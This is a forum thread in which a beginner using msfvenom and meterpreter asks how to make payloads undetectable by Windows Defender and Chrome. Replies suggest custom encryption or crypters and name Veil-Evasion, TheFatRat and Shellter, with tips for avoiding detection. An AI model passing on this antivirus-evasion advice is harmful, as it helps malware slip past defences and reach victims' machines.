Forum Thread: How Can I Make My Payload Undetectable?

I am new to this kali linux stuff, so far i have worked with aircrack-ng, msfvenom and meterpreter. So please help me even if my question may sound silly. Every time i want to test my payload i have to deactivate chrome and windows defender and i want to get better in this...so any ideas? Everthing i have tried so far from forums didn't work or i didn't understand some stuff...if you have a solution using gcc compiler i am open because i have 5 years in c/c++/c# programming Thanks in advance :)

21 Responses

There is almost no way unless you code it yourself now, AV detection is strong, now Veil-Evasion, Shelter, The fat rat (These are the payload encrypter)doesn't work.

Can you tell me how to do this or where to learn?

I have tried some example to copy some rows from msfvenom /x64/..... And some random character string in the code, i have compiled it but the dimension of the file was only 7kb compared to 70 from normal msfvenom, yes the windows defender hasnt found it but when i tried to run it, it gave me a warrning screen with publisher and something

Then you can also encrypt the normal payload by using your own encryption method or there are plenty of encrypters on github.

How do i encrypt it?
All of them use tools like you said before fatrat, vile

Because AV is used to base64 encryption that is from Veil and other payload hider, but if it is a encryption that was never used before in payloads it will work.

For example, there is Malbolge language, which is hard to decrypt

How can i make my own encrypting program?

If those programs don't work, you are using the wrong exe. I know for a fact that Shellter still works perfectly.

You can use Shellter. It's very simple to use and will make it mostly undetectable.

Go to my profile and read my tutorial. You can skip Part 1 entirety.
Shellter works best using a new exe file that was not already detectable.